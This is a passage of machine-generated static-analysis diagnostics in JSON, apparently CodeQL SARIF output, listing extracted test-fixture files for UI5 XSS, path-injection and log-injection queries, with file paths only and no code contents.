Message":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":368}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":369}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":370}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":371}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":374}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":375}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":376}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":377}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":378}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":379}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":380}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":382}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":384}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":385}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":386}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":388}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":389}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":391}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":392}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":393}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":394}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js","uriBaseId":"%SRCROOT%","index":1}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json","uriBaseId":"%SRCROOT%","index":395}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":396}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json","uriBaseId":"%SRCROOT%","index":397}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json","uriBaseId":"%SRCROOT%","index":398}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml","uriBaseId":"%SRCROOT%","index":399}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":404}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json","uriBaseId":"%SRCROOT%","index":405}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html","uriBaseId":"%SRCROOT%","index":411}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html","uriBaseId":"%SRCROOT%","index":414}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html","uriBaseId":"%SRCROOT%","index":418}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":421}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json","uriBaseId":"%SRCROOT%","index":422}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml","uriBaseId":"%SRCROOT%","index":423}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":425}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json","uriBaseId":"%SRCROOT%","index":426}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html","uriBaseId":"%SRCROOT%","index":427}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":429}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json","uriBaseId":"%SRCROOT%","index":431}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json","uriBaseId":"%SRCROOT%","index":432}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml","uriBaseId":"%SRCROOT%","index":433}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html","uriBaseId":"%SRCROOT%","index":436}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":438}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json","uriBaseId":"%SRCROOT%","index":440}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml","uriBaseId":"%SRCROOT%","index":441}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json","uriBaseId":"%SRCROOT%","index":443}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":444}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html","uriBaseId":"%SRCROOT%","index":445}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":447}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactL